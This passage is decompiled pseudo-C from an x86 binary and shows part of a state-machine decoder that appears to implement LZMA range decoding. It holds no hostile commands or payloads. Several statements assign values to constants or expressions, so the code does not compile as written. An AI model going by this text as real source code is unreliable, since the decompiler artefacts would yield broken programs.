                                      											if(_t534 == 0) {
                                      												goto L171;
                                      											} else {
                                      												goto L20;
                                      											}
                                      										case 2:
                                      											L24:
                                      											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                                      											 *(_t613 - 0x84) = 6;
                                      											 *(_t613 - 0x4c) = _t553;
                                      											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
                                      											 *(_t613 - 0x54) = _t606;
                                      											goto L133;
                                      										case 3:
                                      											L21:
                                      											__eflags =  *(_t613 - 0x6c);
                                      											if( *(_t613 - 0x6c) == 0) {
                                      												 *(_t613 - 0x88) = 3;
                                      												goto L170;
                                      											}
                                      											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                      											_t67 = _t613 - 0x70;
                                      											 *_t67 =  &(( *(_t613 - 0x70))[1]);
                                      											__eflags =  *_t67;
                                      											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                      											L23:
                                      											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                                      											if( *(_t613 - 0x48) != 0) {
                                      												goto L21;
                                      											}
                                      											goto L24;
                                      										case 4:
                                      											L133:
                                      											_t531 =  *_t606;
                                      											_t589 = _t531 & 0x0000ffff;
                                      											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                      											if( *(_t613 - 0xc) >= _t565) {
                                      												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                      												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                      												 *(_t613 - 0x40) = 1;
                                      												_t532 = _t531 - (_t531 >> 5);
                                      												 *_t606 = _t532;
                                      											} else {
                                      												 *(_t613 - 0x10) = _t565;
                                      												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                      												 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                      											}
                                      											if( *(_t613 - 0x10) >= 0x1000000) {
                                      												goto L139;
                                      											}
                                      										case 5:
                                      											goto L137;
                                      										case 6:
                                      											__edx = 0;
                                      											__eflags =  *(__ebp - 0x40);
                                      											if( *(__ebp - 0x40) != 0) {
                                      												__eax =  *(__ebp - 4);
                                      												__ecx =  *(__ebp - 0x38);
                                      												 *(__ebp - 0x34) = 1;
                                      												 *(__ebp - 0x84) = 7;
                                      												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                      												while(1) {
                                      													 *(_t613 - 0x54) = _t606;
                                      													goto L133;
                                      												}
                                      											}
                                      											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                      											__esi =  *(__ebp - 0x60);
                                      											__cl = 8;
                                      											__cl = 8 -  *(__ebp - 0x3c);
                                      											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                      											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                      											__ecx =  *(__ebp - 0x3c);
                                      											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                      											__ecx =  *(__ebp - 4);
                                      											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                      											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                      											__eflags =  *(__ebp - 0x38) - 4;
                                      											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                      											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                      											if( *(__ebp - 0x38) >= 4) {
                                      												__eflags =  *(__ebp - 0x38) - 0xa;
                                      												if( *(__ebp - 0x38) >= 0xa) {
                                      													_t98 = __ebp - 0x38;
                                      													 *_t98 =  *(__ebp - 0x38) - 6;
                                      													__eflags =  *_t98;
                                      												} else {
                                      													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                      												}
                                      											} else {
                                      												 *(__ebp - 0x38) = 0;
                                      											}
                                      											__eflags =  *(__ebp - 0x34) - __edx;
                                      											if( *(__ebp - 0x34) == __edx) {
                                      												__ebx = 0;
                                      												__ebx = 1;
                                      												goto L61;
                                      											} else {
                                      												__eax =  *(__ebp - 0x14);
                                      												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                      												__eflags = __eax -  *(__ebp - 0x74);
                                      												if(__eax >=  *(__ebp - 0x74)) {
                                      													__eax = __eax +  *(__ebp - 0x74);
                                      													__eflags = __eax;
                                      												}
                                      												__ecx =  *(__ebp - 8);
                                      												__ebx = 0;
                                      												__ebx = 1;
                                      												__al =  *((intOrPtr*)(__eax + __ecx));
                                      												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                      												goto L41;
                                      											}
                                      										case 7:
                                      											__eflags =  *(__ebp - 0x40) - 1;
                                      											if( *(__ebp - 0x40) != 1) {
                                      												__eax =  *(__ebp - 0x24);
                                      												 *(__ebp - 0x80) = 0x16;
                                      												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                      												__eax =  *(__ebp - 0x28);
                                      												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                      												__eax =  *(__ebp - 0x2c);
                                      												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                      												__eax = 0;
                                      												__eflags =  *(__ebp - 0x38) - 7;
                                      												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                      												__al = __al & 0x000000fd;
                                      												__eax = (__eflags >= 0) - 1 + 0xa;
                                      												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                      												__eax =  *(__ebp - 4);
                                      												__eax =  *(__ebp - 4) + 0x664;
                                      												__eflags = __eax;
                                      												 *(__ebp - 0x58) = __eax;
                                      												goto L69;
                                      											}
                                      											__eax =  *(__ebp - 4);
                                      											__ecx =  *(__ebp - 0x38);
                                      											 *(__ebp - 0x84) = 8;
                                      											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                      											while(1) {
                                      												 *(_t613 - 0x54) = _t606;
                                      												goto L133;
                                      											}
                                      										case 8:
                                      											goto L0;
                                      										case 9:
                                      											__eflags =  *(__ebp - 0x40);
                                      											if( *(__ebp - 0x40) != 0) {
                                      												goto L89;
                                      											}
                                      											__eflags =  *(__ebp - 0x60);
                                      											if( *(__ebp - 0x60) == 0) {
                                      												goto L171;
                                      											}
                                      											__eax = 0;
                                      											__eflags =  *(__ebp - 0x38) - 7;
                                      											_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                      											__eflags = _t258;
                                      											0 | _t258 = _t258 + _t258 + 9;
                                      											 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                      											goto L75;
                                      										case 0xa:
                                      											__eflags =  *(__ebp - 0x40);
                                      											if( *(__ebp - 0x40) != 0) {
                                      												__eax =  *(__ebp - 4);
                                      												__ecx =  *(__ebp - 0x38);
                                      												 *(__ebp - 0x84) = 0xb;
                                      												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                      												while(1) {
                                      													 *(_t613 - 0x54) = _t606;
                                      													goto L133;
                                      												}
                                      											}
                                      											__eax =  *(__ebp - 0x28);
                                      											goto L88;
                                      										case 0xb:
                                      											__eflags =  *(__ebp - 0x40);
                                      											if( *(__ebp - 0x40) != 0) {
                                      												__ecx =  *(__ebp - 0x24);
                                      												__eax =  *(__ebp - 0x20);
                                      												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                      											} else {
                                      												__eax =  *(__ebp - 0x24);
                                      											}
                                      											__ecx =  *(__ebp - 0x28);
                                      											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                      											L88:
                                      											__ecx =  *(__ebp - 0x2c);
                                      											 *(__ebp - 0x2c) = __eax;
                                      											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                      											L89:
                                      											__eax =  *(__ebp - 4);
                                      											 *(__ebp - 0x80) = 0x15;
                                      											__eax =  *(__ebp - 4) + 0xa68;
                                      											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                      											goto L69;
                                      										case 0xc:
                                      											L99:
                                      											__eflags =  *(__ebp - 0x6c);
                                      											if( *(__ebp - 0x6c) == 0) {
                                      												 *(__ebp - 0x88) = 0xc;
                                      												goto L170;
                                      											}
                                      											__ecx =  *(__ebp - 0x70);
                                      											__eax =  *(__ebp - 0xc);
                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                      											_t334 = __ebp - 0x70;
                                      											 *_t334 =  *(__ebp - 0x70) + 1;
                                      											__eflags =  *_t334;
                                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                      											__eax =  *(__ebp - 0x2c);
                                      											goto L101;
                                      										case 0xd:
                                      											L37:
                                      											__eflags =  *(__ebp - 0x6c);
                                      											if( *(__ebp - 0x6c) == 0) {
                                      												 *(__ebp - 0x88) = 0xd;
                                      												goto L170;
                                      											}
                                      											__ecx =  *(__ebp - 0x70);
                                      											__eax =  *(__ebp - 0xc);
                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                      											_t122 = __ebp - 0x70;
                                      											 *_t122 =  *(__ebp - 0x70) + 1;
                                      											__eflags =  *_t122;
                                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                      											L39:
                                      											__eax =  *(__ebp - 0x40);
                                      											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                      											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                      												goto L48;
                                      											}
                                      											__eflags = __ebx - 0x100;
                                      											if(__ebx >= 0x100) {
                                      												goto L54;
                                      											}
                                      											L41:
                                      											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                      											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                      											__ecx =  *(__ebp - 0x58);
                                      											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                      											 *(__ebp - 0x48) = __eax;
                                      											__eax = __eax + 1;
                                      											__eax = __eax << 8;
                                      											__eax = __eax + __ebx;
                                      											__esi =  *(__ebp - 0x58) + __eax * 2;
                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                      											__ax =  *__esi;
                                      											 *(__ebp - 0x54) = __esi;
                                      											__edx = __ax & 0x0000ffff;
                                      											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                      											__eflags =  *(__ebp - 0xc) - __ecx;
                                      											if( *(__ebp - 0xc) >= __ecx) {
                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                      												__cx = __ax;
                                      												 *(__ebp - 0x40) = 1;
                                      												__cx = __ax >> 5;
                                      												__eflags = __eax;
                                      												__ebx = __ebx + __ebx + 1;
                                      												 *__esi = __ax;
                                      											} else {
                                      												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                      												 *(__ebp - 0x10) = __ecx;
                                      												0x800 = 0x800 - __edx;
                                      												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                      												__ebx = __ebx + __ebx;
                                      												 *__esi = __cx;
                                      											}
                                      											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                      											 *(__ebp - 0x44) = __ebx;
                                      											if( *(__ebp - 0x10) >= 0x1000000) {
                                      												goto L39;
                                      											} else {
                                      												goto L37;
                                      											}
                                      										case 0xe:
                                      											L46:
                                      											__eflags =  *(__ebp - 0x6c);
                                      											if( *(__ebp - 0x6c) == 0) {
                                      												 *(__ebp - 0x88) = 0xe;
                                      												goto L170;
                                      											}
                                      											__ecx =  *(__ebp - 0x70);
                                      											__eax =  *(__ebp - 0xc);
                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                      											_t156 = __ebp - 0x70;
                                      											 *_t156 =  *(__ebp - 0x70) + 1;
                                      											__eflags =  *_t156;
                                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                      											while(1) {
                                      												L48:
                                      												__eflags = __ebx - 0x100;
                                      												if(__ebx >= 0x100) {
                                      													break;
                                      												}
                                      												__eax =  *(__ebp - 0x58);
                                      												__edx = __ebx + __ebx;
                                      												__ecx =  *(__ebp - 0x10);
                                      												__esi = __edx + __eax;
                                      												__ecx =  *(__ebp - 0x10) >> 0xb;
                                      												__ax =  *__esi;
                                      												 *(__ebp - 0x54) = __esi;
                                      												__edi = __ax & 0x0000ffff;
                                      												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                      												__eflags =  *(__ebp - 0xc) - __ecx;
                                      												if( *(__ebp - 0xc) >= __ecx) {
                                      													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                      													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                      													__cx = __ax;
                                      													_t170 = __edx + 1; // 0x1
                                      													__ebx = _t170;
                                      													__cx = __ax >> 5;
                                      													__eflags = __eax;
                                      													 *__esi = __ax;
                                      												} else {
                                      													 *(__ebp - 0x10) = __ecx;
                                      													0x800 = 0x800 - __edi;
                                      													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                      													__ebx = __ebx + __ebx;
                                      													 *__esi = __cx;
                                      												}
                                      												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                      												 *(__ebp - 0x44) = __ebx;
                                      												if( *(__ebp - 0x10) >= 0x1000000) {
                                      													continue;
                                      												} else {
                                      													goto L46;
                                      												}
                                      											}
                                      											L54:
                                      											_t173 = __ebp - 0x34;
                                      											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                      											__eflags =  *_t173;
                                      											goto L55;
                                      										case 0xf:
                                      											L58:
                                      											__eflags =  *(__ebp - 0x6c);
                                      											if( *(__ebp - 0x6c) == 0) {
                                      												 *(__ebp - 0x88) = 0xf;
                                      												goto L170;
                                      											}
                                      											__ecx =  *(__ebp - 0x70);
                                      											__eax =  *(__ebp - 0xc);
                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                      											_t203 = __ebp - 0x70;
                                      											 *_t203 =  *(__ebp - 0x70) + 1;
                                      											__eflags =  *_t203;
                                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                      											L60:
                                      											__eflags = __ebx - 0x100;
                                      											if(__ebx >= 0x100) {
                                      												L55:
                                      												__al =  *(__ebp - 0x44);
                                      												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                      												goto L56;
                                      											}
                                      											L61:
                                      											__eax =  *(__ebp - 0x58);
                                      											__edx = __ebx + __ebx;
                                      											__ecx =  *(__ebp - 0x10);
                                      											__esi = __edx + __eax;
                                      											__ecx =  *(__ebp - 0x10) >> 0xb;
                                      											__ax =  *__esi;
                                      											 *(__ebp - 0x54) = __esi;
                                      											__edi = __ax & 0x0000ffff;
                                      											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                      											__eflags =  *(__ebp - 0xc) - __ecx;
                                      											if( *(__ebp - 0xc) >= __ecx) {
                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                      												__cx = __ax;
                                      												_t217 = __edx + 1; // 0x1
                                      												__ebx = _t217;
                                      												__cx = __ax >> 5;
                                      												__eflags = __eax;
                                      												 *__esi = __ax;
                                      											} else {
                                      												 *(__ebp - 0x10) = __ecx;
                                      												0x800 = 0x800 - __edi;
                                      												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                      												__ebx = __ebx + __ebx;
                                      												 *__esi = __cx;
                                      											}
                                      											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                      											 *(__ebp - 0x44) = __ebx;
                                      											if( *(__ebp - 0x10) >= 0x1000000) {
                                      												goto L60;
                                      											} else {
                                      												goto L58;
                                      											}
                                      										case 0x10:
                                      											L109:
                                      											__eflags =  *(__ebp - 0x6c);
                                      											if( *(__ebp - 0x6c) == 0) {
                                      												 *(__ebp - 0x88) = 0x10;
                                      												goto L170;
                                      											}
                                      											__ecx =  *(__ebp - 0x70);
                                      											__eax =  *(__ebp - 0xc);
                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                      											_t365 = __ebp - 0x70;
                                      											 *_t365 =  *(__ebp - 0x70) + 1;
                                      											__eflags =  *_t365;
                                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                      											goto L111;
                                      										case 0x11:
                                      											L69:
                                      											__esi =  *(__ebp - 0x58);
                                      											 *(__ebp - 0x84) = 0x12;
                                      											while(1) {
                                      												 *(_t613 - 0x54) = _t606;
                                      												goto L133;
                                      											}
                                      										case 0x12:
                                      											__eflags =  *(__ebp - 0x40);
                                      											if( *(__ebp - 0x40) != 0) {
                                      												__eax =  *(__ebp - 0x58);
                                      												 *(__ebp - 0x84) = 0x13;
                                      												__esi =  *(__ebp - 0x58) + 2;
                                      												while(1) {
                                      													 *(_t613 - 0x54) = _t606;
                                      													goto L133;
                                      												}
                                      											}
                                      											__eax =  *(__ebp - 0x4c);
                                      											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                      											__ecx =  *(__ebp - 0x58);
                                      											__eax =  *(__ebp - 0x4c) << 4;
                                      											__eflags = __eax;
                                      											__eax =  *(__ebp - 0x58) + __eax + 4;
                                      											goto L130;
                                      										case 0x13:
                                      											__eflags =  *(__ebp - 0x40);
                                      											if( *(__ebp - 0x40) != 0) {
                                      												_t469 = __ebp - 0x58;
                                      												 *_t469 =  *(__ebp - 0x58) + 0x204;
                                      												__eflags =  *_t469;
                                      												 *(__ebp - 0x30) = 0x10;
                                      												 *(__ebp - 0x40) = 8;
                                      												L144:
                                      												 *(__ebp - 0x7c) = 0x14;
                                      												goto L145;
                                      											}
                                      											__eax =  *(__ebp - 0x4c);
                                      											__ecx =  *(__ebp - 0x58);
                                      											__eax =  *(__ebp - 0x4c) << 4;
                                      											 *(__ebp - 0x30) = 8;
                                      											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                      											L130:
                                      											 *(__ebp - 0x58) = __eax;
                                      											 *(__ebp - 0x40) = 3;
                                      											goto L144;
                                      										case 0x14:
                                      											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                      											__eax =  *(__ebp - 0x80);
                                      											 *(_t613 - 0x88) = _t533;
                                      											goto L1;
                                      										case 0x15:
                                      											__eax = 0;
                                      											__eflags =  *(__ebp - 0x38) - 7;
                                      											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                      											__al = __al & 0x000000fd;
                                      											__eax = (__eflags >= 0) - 1 + 0xb;
                                      											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                      											goto L120;
                                      										case 0x16:
                                      											__eax =  *(__ebp - 0x30);
                                      											__eflags = __eax - 4;
                                      											if(__eax >= 4) {
                                      												_push(3);
                                      												_pop(__eax);
                                      											}
                                      											__ecx =  *(__ebp - 4);
                                      											 *(__ebp - 0x40) = 6;
                                      											__eax = __eax << 7;
                                      											 *(__ebp - 0x7c) = 0x19;
                                      											 *(__ebp - 0x58) = __eax;
                                      											goto L145;
                                      										case 0x17:
                                      											L145:
                                      											__eax =  *(__ebp - 0x40);
                                      											 *(__ebp - 0x50) = 1;
                                      											 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                      											goto L149;
                                      										case 0x18:
                                      											L146:
                                      											__eflags =  *(__ebp - 0x6c);
                                      											if( *(__ebp - 0x6c) == 0) {
                                      												 *(__ebp - 0x88) = 0x18;
                                      												goto L170;
                                      											}
                                      											__ecx =  *(__ebp - 0x70);
                                      											__eax =  *(__ebp - 0xc);
                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                      											_t484 = __ebp - 0x70;
                                      											 *_t484 =  *(__ebp - 0x70) + 1;
                                      											__eflags =  *_t484;
                                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                      											L148:
                                      											_t487 = __ebp - 0x48;
                                      											 *_t487 =  *(__ebp - 0x48) - 1;
                                      											__eflags =  *_t487;
                                      											L149:
                                      											__eflags =  *(__ebp - 0x48);
                                      											if( *(__ebp - 0x48) <= 0) {
                                      												__ecx =  *(__ebp - 0x40);
                                      												__ebx =  *(__ebp - 0x50);
                                      												0 = 1;
                                      												__eax = 1 << __cl;
                                      												__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                      												__eax =  *(__ebp - 0x7c);
                                      												 *(__ebp - 0x44) = __ebx;
                                      												while(1) {
                                      													 *(_t613 - 0x88) = _t533;
                                      													goto L1;
                                      												}
                                      											}
                                      											__eax =  *(__ebp - 0x50);
                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                      											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                      											__eax =  *(__ebp - 0x58);
                                      											__esi = __edx + __eax;
                                      											 *(__ebp - 0x54) = __esi;
                                      											__ax =  *__esi;
                                      											__edi = __ax & 0x0000ffff;
                                      											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                      											__eflags =  *(__ebp - 0xc) - __ecx;
                                      											if( *(__ebp - 0xc) >= __ecx) {
                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                      												__cx = __ax;
                                      												__cx = __ax >> 5;
                                      												__eax = __eax - __ecx;
                                      												__edx = __edx + 1;
                                      												__eflags = __edx;
                                      												 *__esi = __ax;
                                      												 *(__ebp - 0x50) = __edx;
                                      											} else {
                                      												 *(__ebp - 0x10) = __ecx;
                                      												0x800 = 0x800 - __edi;
                                      												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                      												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                      												 *__esi = __cx;
                                      											}
                                      											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                      											if( *(__ebp - 0x10) >= 0x1000000) {
                                      												goto L148;
                                      											} else {
                                      												goto L146;
                                      											}
                                      										case 0x19:
                                      											__eflags = __ebx - 4;
                                      											if(__ebx < 4) {
                                      												 *(__ebp - 0x2c) = __ebx;
                                      												L119:
                                      												_t393 = __ebp - 0x2c;
                                      												 *_t393 =  *(__ebp - 0x2c) + 1;
                                      												__eflags =  *_t393;
                                      												L120:
                                      												__eax =  *(__ebp - 0x2c);
                                      												__eflags = __eax;
                                      												if(__eax == 0) {
                                      													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                      													goto L170;
                                      												}
                                      												__eflags = __eax -  *(__ebp - 0x60);
                                      												if(__eax >  *(__ebp - 0x60)) {
                                      													goto L171;
                                      												}
                                      												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                      												__eax =  *(__ebp - 0x30);
                                      												_t400 = __ebp - 0x60;
                                      												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                      												__eflags =  *_t400;
                                      												goto L123;
                                      											}
                                      											__ecx = __ebx;
                                      											__eax = __ebx;
                                      											__ecx = __ebx >> 1;
                                      											__eax = __ebx & 0x00000001;
                                      											__ecx = (__ebx >> 1) - 1;
                                      											__al = __al | 0x00000002;
                                      											__eax = (__ebx & 0x00000001) << __cl;
                                      											__eflags = __ebx - 0xe;
                                      											 *(__ebp - 0x2c) = __eax;
                                      											if(__ebx >= 0xe) {
                                      												__ebx = 0;
                                      												 *(__ebp - 0x48) = __ecx;
                                      												L102:
                                      												__eflags =  *(__ebp - 0x48);
                                      												if( *(__ebp - 0x48) <= 0) {
                                      													__eax = __eax + __ebx;
                                      													 *(__ebp - 0x40) = 4;
                                      													 *(__ebp - 0x2c) = __eax;
                                      													__eax =  *(__ebp - 4);
                                      													__eax =  *(__ebp - 4) + 0x644;
                                      													__eflags = __eax;
                                      													L108:
                                      													__ebx = 0;
                                      													 *(__ebp - 0x58) = __eax;
                                      													 *(__ebp - 0x50) = 1;
                                      													 *(__ebp - 0x44) = 0;
                                      													 *(__ebp - 0x48) = 0;
                                      													L112:
                                      													__eax =  *(__ebp - 0x40);
                                      													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                      													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                      														_t391 = __ebp - 0x2c;
                                      														 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                      														__eflags =  *_t391;
                                      														goto L119;
                                      													}
                                      													__eax =  *(__ebp - 0x50);
                                      													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                      													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                      													__eax =  *(__ebp - 0x58);
                                      													__esi = __edi + __eax;
                                      													 *(__ebp - 0x54) = __esi;
                                      													__ax =  *__esi;
                                      													__ecx = __ax & 0x0000ffff;
                                      													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                      													__eflags =  *(__ebp - 0xc) - __edx;
                                      													if( *(__ebp - 0xc) >= __edx) {
                                      														__ecx = 0;
                                      														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                      														__ecx = 1;
                                      														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                      														__ebx = 1;
                                      														__ecx =  *(__ebp - 0x48);
                                      														__ebx = 1 << __cl;
                                      														__ecx = 1 << __cl;
                                      														__ebx =  *(__ebp - 0x44);
                                      														__ebx =  *(__ebp - 0x44) | __ecx;
                                      														__cx = __ax;
                                      														__cx = __ax >> 5;
                                      														__eax = __eax - __ecx;
                                      														__edi = __edi + 1;
                                      														__eflags = __edi;
                                      														 *(__ebp - 0x44) = __ebx;
                                      														 *__esi = __ax;
                                      														 *(__ebp - 0x50) = __edi;
                                      													} else {
                                      														 *(__ebp - 0x10) = __edx;
                                      														0x800 = 0x800 - __ecx;
                                      														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                      														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                      														 *__esi = __dx;
                                      													}
                                      													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                      													if( *(__ebp - 0x10) >= 0x1000000) {
                                      														L111:
                                      														_t368 = __ebp - 0x48;
                                      														 *_t368 =  *(__ebp - 0x48) + 1;
                                      														__eflags =  *_t368;
                                      														goto L112;
                                      													} else {
                                      														goto L109;
                                      													}
                                      												}
                                      												__ecx =  *(__ebp - 0xc);
                                      												__ebx = __ebx + __ebx;
                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                      												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                      												 *(__ebp - 0x44) = __ebx;
